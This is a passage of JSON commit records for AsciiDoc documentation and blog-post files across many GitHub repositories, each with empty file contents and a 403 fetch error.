{"commit":"fdd897e58e6bcb5d881b08d15b84cbf77b2e1953","subject":"Update 2016-08-21-What-to-expect-from-this-blog.adoc","message":"Update 2016-08-21-What-to-expect-from-this-blog.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-08-21-What-to-expect-from-this-blog.adoc","new_file":"_posts\/2016-08-21-What-to-expect-from-this-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"58776c0a178fe5fcf0f6c96fb7fe7556581572f4","subject":"Works on doc","message":"Works on doc\n","repos":"endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox","old_file":"doc\/api\/ubf\/Bvstof.adoc","new_file":"doc\/api\/ubf\/Bvstof.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/endurox-dev\/endurox.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"bdb298bfb8c0e1930d0c33d0f5c3fd862e2980d6","subject":"Change ConfigurableDataProvider for ConfigurableFilterDataProvider (#9681)","message":"Change ConfigurableDataProvider for ConfigurableFilterDataProvider (#9681)\n\nIt says ConfigurableDataProvider, but there isn't a ConfigurableDataProvider 
class.","repos":"asashour\/framework,asashour\/framework,mstahv\/framework,mstahv\/framework,mstahv\/framework,Darsstar\/framework,mstahv\/framework,Darsstar\/framework,Darsstar\/framework,asashour\/framework,Darsstar\/framework,asashour\/framework,Darsstar\/framework,asashour\/framework,mstahv\/framework","old_file":"documentation\/datamodel\/datamodel-providers.asciidoc","new_file":"documentation\/datamodel\/datamodel-providers.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mstahv\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cc144e647a2b8204f6fd71739a568a0d72f69ffc","subject":"docs: update with requested changes","message":"docs: update with requested changes\n","repos":"dulanov\/emerald-rs","old_file":"docs\/api.adoc","new_file":"docs\/api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0e363ae9b0c114e321b31bf34679988b12bbb1bd","subject":"doc(index): Replace Description","message":"doc(index): Replace Description\n","repos":"jsGiven\/jsGiven","old_file":"documentation\/index.adoc","new_file":"documentation\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsGiven\/jsGiven.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d6a1a9f8da3387d33c8f73686885bc118ad340db","subject":"Update 2016-07-21-Sacrifice.adoc","message":"Update 2016-07-21-Sacrifice.adoc","repos":"gorjason\/gorjason.github.io,gorjason\/gorjason.github.io,gorjason\/gorjason.github.io,gorjason\/gorjason.github.io","old_file":"_posts\/2016-07-21-Sacrifice.adoc","new_file":"_posts\/2016-07-21-Sacrifice.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gorjason\/gorjason.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eac0e92f934e6c1578089a1fe21f6c3146032c6a","subject":"Update 2019-03-12-A-B-Java-Script.adoc","message":"Update 2019-03-12-A-B-Java-Script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-12-A-B-Java-Script.adoc","new_file":"_posts\/2019-03-12-A-B-Java-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf5e2a7bcaf5ebe234098495a46ce4e01e63a6d6","subject":"Update 2016-06-24-Kitchen-Sink.adoc","message":"Update 2016-06-24-Kitchen-Sink.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e801ed0fdab31caaaf681741944d902d53eda0c","subject":"Update 2015-05-20-Preparing-Multi-labelled-Image-dataset.adoc","message":"Update 
2015-05-20-Preparing-Multi-labelled-Image-dataset.adoc","repos":"nikogamulin\/nikogamulin.github.io,nikogamulin\/nikogamulin.github.io,nikogamulin\/nikogamulin.github.io","old_file":"_posts\/2015-05-20-Preparing-Multi-labelled-Image-dataset.adoc","new_file":"_posts\/2015-05-20-Preparing-Multi-labelled-Image-dataset.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nikogamulin\/nikogamulin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ec9a697d2a0a19c40d1bd81a197b6a1b1eee61ca","subject":"doc: v2.37 update","message":"doc: v2.37 update\n\nSigned-off-by: Hanoh Haim <1f34741bfa88280155d5053f5e8f4b89d8aa79bf@cisco.com>\n","repos":"dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core","old_file":"doc\/release_notes.asciidoc","new_file":"doc\/release_notes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dimagol\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"762f4692a7ee26917af30bbed8e933e9d1485fae","subject":"Update 2016-04-28-What-is-Functional-Programming.adoc","message":"Update 2016-04-28-What-is-Functional-Programming.adoc","repos":"pysaumont\/pysaumont.github.io,pysaumont\/pysaumont.github.io,pysaumont\/pysaumont.github.io,pysaumont\/pysaumont.github.io","old_file":"_posts\/2016-04-28-What-is-Functional-Programming.adoc","new_file":"_posts\/2016-04-28-What-is-Functional-Programming.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pysaumont\/pysaumont.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c3dcee76b5da87f8d10751e224ee69ac61b3bc0b","subject":"Adding a README for Linux","message":"Adding a README for Linux\n","repos":"cmrosenberg\/dotfiles","old_file":"linux\/README.asciidoc","new_file":"linux\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmrosenberg\/dotfiles.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09c27843db54c012f3c023a38c74544aedac2019","subject":"Create do-code-block-fil.adoc","message":"Create do-code-block-fil.adoc\n\nFilipino translation for do-code-block.adoc","repos":"eddiejaoude\/book-open-source-tips","old_file":"src\/do\/do-code-block-fil.adoc","new_file":"src\/do\/do-code-block-fil.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eddiejaoude\/book-open-source-tips.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5dfc68fe8512dfe4d647163a89f53b26c6bf9aa0","subject":"break line in right place","message":"break line in right place\n","repos":"akgood\/yubico-piv-tool,ato\/yubico-piv-tool,akgood\/yubico-piv-tool,Yubico\/yubico-piv-tool,hirden\/yubico-piv-tool,akgood\/yubico-piv-tool,akgood\/yubico-piv-tool,hirden\/yubico-piv-tool,ato\/yubico-piv-tool,Yubico\/yubico-piv-tool,Yubico\/yubico-piv-tool","old_file":"doc\/Windows-Certificate.asciidoc","new_file":"doc\/Windows-Certificate.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubico-piv-tool.git\/': The requested URL returned error: 
403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"5d363e8cfbbac838f243fe3c06111205bcda897f","subject":"Update 2017-02-21.adoc","message":"Update 2017-02-21.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"_posts\/2017-02-21.adoc","new_file":"_posts\/2017-02-21.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"77150a6af99eeec7266061d0a39e610aa145f565","subject":"Update 2016-03-30-Analisis-Paquetes.adoc","message":"Update 2016-03-30-Analisis-Paquetes.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Analisis-Paquetes.adoc","new_file":"_posts\/2016-03-30-Analisis-Paquetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4a6dd5a24fb94a236c3d4d5ad5f408610d83bd96","subject":"Update 2015-02-01-the-AsciiDoc-introduction.adoc","message":"Update 2015-02-01-the-AsciiDoc-introduction.adoc","repos":"deepwind\/deepwind.github.io,deepwind\/deepwind.github.io,deepwind\/deepwind.github.io","old_file":"_posts\/2015-02-01-the-AsciiDoc-introduction.adoc","new_file":"_posts\/2015-02-01-the-AsciiDoc-introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/deepwind\/deepwind.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5c1b7d2f65766e189ed3c261175764126e6ddaa0","subject":"y2b create post Best Smartphone Under $400?","message":"y2b create post Best Smartphone Under $400?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-08-30-Best-Smartphone-Under-400.adoc","new_file":"_posts\/2015-08-30-Best-Smartphone-Under-400.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7adddb6b300b66aa73df426de55382b3c33b249e","subject":"Remove old SecurityContextHolder Docs","message":"Remove old SecurityContextHolder Docs\n\nIssue 
gh-8005\n","repos":"djechelon\/spring-security,jgrandja\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,djechelon\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,rwinch\/spring-security,djechelon\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,jgrandja\/spring-security,fhanik\/spring-security,fhanik\/spring-security,jgrandja\/spring-security,djechelon\/spring-security,spring-projects\/spring-security,fhanik\/spring-security,djechelon\/spring-security,jgrandja\/spring-security,spring-projects\/spring-security,fhanik\/spring-security,rwinch\/spring-security,fhanik\/spring-security,jgrandja\/spring-security,fhanik\/spring-security,rwinch\/spring-security,jgrandja\/spring-security,rwinch\/spring-security","old_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/servlet\/architecture\/technical-overview.adoc","new_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/servlet\/architecture\/technical-overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fhanik\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4631b2fc4deb871b218b4c2206f1bbf9c609eeff","subject":"y2b create post My Problem With The Apple Watch...","message":"y2b create post My Problem With The Apple Watch...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-01-My-Problem-With-The-Apple-Watch.adoc","new_file":"_posts\/2016-08-01-My-Problem-With-The-Apple-Watch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0cf0e844bb724921d48f599698ea3f363d0ecbc","subject":"y2b create post Using The World's Smallest Phone...","message":"y2b create post Using The World's Smallest Phone...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-20-Using-The-Worlds-Smallest-Phone.adoc","new_file":"_posts\/2016-08-20-Using-The-Worlds-Smallest-Phone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d045189e36e73ebc7078b8b6b94333ff5f29be9d","subject":"Update 2013-10-16-Episode-1-The-Pilot.adoc","message":"Update 2013-10-16-Episode-1-The-Pilot.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2013-10-16-Episode-1-The-Pilot.adoc","new_file":"_posts\/2013-10-16-Episode-1-The-Pilot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"67c2115dc88fb6cb772d53ae936c50c0453dc6bc","subject":"y2b create post Razer Project Fiona Gaming Tablet","message":"y2b create post Razer Project Fiona Gaming 
Tablet","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-12-Razer-Project-Fiona-Gaming-Tablet.adoc","new_file":"_posts\/2012-01-12-Razer-Project-Fiona-Gaming-Tablet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eda9b5608332afc63bcc131f4d36e70bf4de79c0","subject":"Ref doc for Spanner (#465)","message":"Ref doc for Spanner (#465)\n\n* Ref doc for Spanner\r\n\r\n* format fix\r\n\r\n* link fix\r\n","repos":"spring-cloud\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,spring-cloud\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,spring-cloud\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,spring-cloud\/spring-cloud-gcp","old_file":"docs\/src\/main\/asciidoc\/spanner.adoc","new_file":"docs\/src\/main\/asciidoc\/spanner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-gcp.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f4dea4845a27e185da23813424c5ad8f346e6a4b","subject":"Add clj script guide","message":"Add clj script guide\n","repos":"clojure\/clojure-site","old_file":"content\/guides\/clj.adoc","new_file":"content\/guides\/clj.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"e4ac4665282b7e755026bb6163b0979a25c08f0f","subject":"y2b create post SWITCHING TO SAMSUNG GALAXY S7","message":"y2b create post SWITCHING TO SAMSUNG GALAXY S7","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-03-22-SWITCHING-TO-SAMSUNG-GALAXY-S7.adoc","new_file":"_posts\/2016-03-22-SWITCHING-TO-SAMSUNG-GALAXY-S7.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a64c9a6d492fced40d8ec286bdc7bcc81634d212","subject":"Add README.adoc for hdfs-dataset","message":"Add README.adoc for hdfs-dataset\n\nResolves #211\n","repos":"spring-cloud\/spring-cloud-stream-app-starters,spring-cloud\/spring-cloud-stream-app-starters,spring-cloud\/spring-cloud-stream-app-starters,sobychacko\/spring-cloud-stream-app-starters,sobychacko\/spring-cloud-stream-app-starters,sobychacko\/spring-cloud-stream-app-starters,spring-cloud\/spring-cloud-stream-app-starters,sobychacko\/spring-cloud-stream-app-starters","old_file":"hdfs\/spring-cloud-starter-stream-sink-hdfs-dataset\/README.adoc","new_file":"hdfs\/spring-cloud-starter-stream-sink-hdfs-dataset\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sobychacko\/spring-cloud-stream-app-starters.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b9ecf1f0c7201985d7e6a1851c926a3dd8453038","subject":"Initializing openshift-docs 
repo","message":"Initializing openshift-docs repo\n","repos":"nhr\/ascii_binder,Fryguy\/ascii_binder,nhr\/ascii_binder,Fryguy\/doc_site_builder,Fryguy\/ascii_binder,redhataccess\/ascii_binder,redhataccess\/doc_site_builder,redhataccess\/doc_site_builder,redhataccess\/ascii_binder","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Fryguy\/doc_site_builder.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6607350b0743ca03bef4807a50d9e25a555a492d","subject":"doc: ASTF typos","message":"doc: ASTF typos\n\nSigned-off-by: Hanoh Haim <1f34741bfa88280155d5053f5e8f4b89d8aa79bf@cisco.com>\n","repos":"dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core","old_file":"doc\/trex_astf.asciidoc","new_file":"doc\/trex_astf.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dimagol\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"87bd862cb63785158affc065724b57bda7a5a7f4","subject":"[docs] Add another workaround for macOS","message":"[docs] Add another workaround for macOS\n\nI encountered an issue that was preventing me from building thirdparties\nand with Adar's help I found a way to get unstuck. This patch adds more\ninstructions to our macOS installation instructions.\n\nChange-Id: I870189eddec0a2e34221b5bbdf85353a91fcf527\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/6456\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\nTested-by: Kudu Jenkins\n","repos":"helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ef155642f32abe17ccea09b764c1e331fb6fc354","subject":"docs update","message":"docs update\n","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"47f0281275682bf64b1a16343d22e281da245ff5","subject":"y2b create post GOT NEW SPEAKERS! (Audioengine A5+ Unboxing)","message":"y2b create post GOT NEW SPEAKERS! 
(Audioengine A5+ Unboxing)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-03-05-GOT-NEW-SPEAKERS-Audioengine-A5-Unboxing.adoc","new_file":"_posts\/2014-03-05-GOT-NEW-SPEAKERS-Audioengine-A5-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ad09b400fd2447812e7e7bfbc223cb4541b28c14","subject":"y2b create post 3 Cool Gadgets Under $50","message":"y2b create post 3 Cool Gadgets Under $50","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-04-18-3-Cool-Gadgets-Under-50.adoc","new_file":"_posts\/2017-04-18-3-Cool-Gadgets-Under-50.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ddedfc1d40f64f6e4422794df27179f8389624a1","subject":"Updates book-using-jison-beyond-the-basics\/1_Goal.adoc","message":"Updates book-using-jison-beyond-the-basics\/1_Goal.adoc\n\nAuto commit by GitBook Editor","repos":"GerHobbelt\/jison,GerHobbelt\/jison,GerHobbelt\/jison,GerHobbelt\/jison","old_file":"book-using-jison-beyond-the-basics\/1_Goal.adoc","new_file":"book-using-jison-beyond-the-basics\/1_Goal.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GerHobbelt\/jison.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"501ff121885eab87fd05c37988910dd6924a32df","subject":"Update 2016-10-02-Welcome-Blogging-World.adoc","message":"Update 2016-10-02-Welcome-Blogging-World.adoc","repos":"PierreBtz\/pierrebtz.github.io,PierreBtz\/pierrebtz.github.io,PierreBtz\/pierrebtz.github.io,PierreBtz\/pierrebtz.github.io","old_file":"_posts\/2016-10-02-Welcome-Blogging-World.adoc","new_file":"_posts\/2016-10-02-Welcome-Blogging-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PierreBtz\/pierrebtz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32f2e0017cfcdc4592008dd30cec9d8a0c4e7311","subject":"Update 2015-10-02-When-Epiales-Calls.adoc","message":"Update 2015-10-02-When-Epiales-Calls.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-10-02-When-Epiales-Calls.adoc","new_file":"_posts\/2015-10-02-When-Epiales-Calls.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"91d8e0a45ceb5ff095fc7202d5e7133c85848230","subject":"Delete the file at '_posts\/2017-05-31-Naming-Conventions.adoc'","message":"Delete the file at 
'_posts\/2017-05-31-Naming-Conventions.adoc'","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2017-05-31-Naming-Conventions.adoc","new_file":"_posts\/2017-05-31-Naming-Conventions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f856c10879e76df3c6f49890a7990ce14013e4c","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f3e2e6d0618da26eca4a5cbc464241a6acc03987","subject":"Update 2017-04-23-Server-Virtualization-Management.adoc","message":"Update 2017-04-23-Server-Virtualization-Management.adoc","repos":"roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io","old_file":"_posts\/2017-04-23-Server-Virtualization-Management.adoc","new_file":"_posts\/2017-04-23-Server-Virtualization-Management.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/roobyz\/roobyz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f881c474e075713f0bfc5f90228ff11bc260ae4","subject":"Update 2016-07-08-Word-Press-3.adoc","message":"Update 2016-07-08-Word-Press-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-08-Word-Press-3.adoc","new_file":"_posts\/2016-07-08-Word-Press-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fec9dc0558163ba48e1470dd2cbc7642292b403d","subject":"Update 2016-08-31-Another-Post.adoc","message":"Update 2016-08-31-Another-Post.adoc","repos":"crisgoncalves\/crisgoncalves.github.io,crisgoncalves\/crisgoncalves.github.io,crisgoncalves\/crisgoncalves.github.io,crisgoncalves\/crisgoncalves.github.io","old_file":"_posts\/2016-08-31-Another-Post.adoc","new_file":"_posts\/2016-08-31-Another-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crisgoncalves\/crisgoncalves.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a689b994b5fb50d57031ecc8c97df8ab5d11f92f","subject":"Update 2017-05-12-picture-book.adoc","message":"Update 
2017-05-12-picture-book.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-12-picture-book.adoc","new_file":"_posts\/2017-05-12-picture-book.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c52c22b10e247e9975f207fe05fdc41d563660ba","subject":"New implicit provisioning hack document for current workflow.","message":"New implicit provisioning hack document for current workflow.\n","repos":"advancedtelematic\/sota_client_cpp,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/sota_client_cpp,advancedtelematic\/aktualizr","old_file":"docs\/hacky-implicit-provisioning-version2.adoc","new_file":"docs\/hacky-implicit-provisioning-version2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/advancedtelematic\/sota_client_cpp.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"85a7be9cf062df0a8de3c469d770168055246e9e","subject":"Improve readme confusion","message":"Improve readme 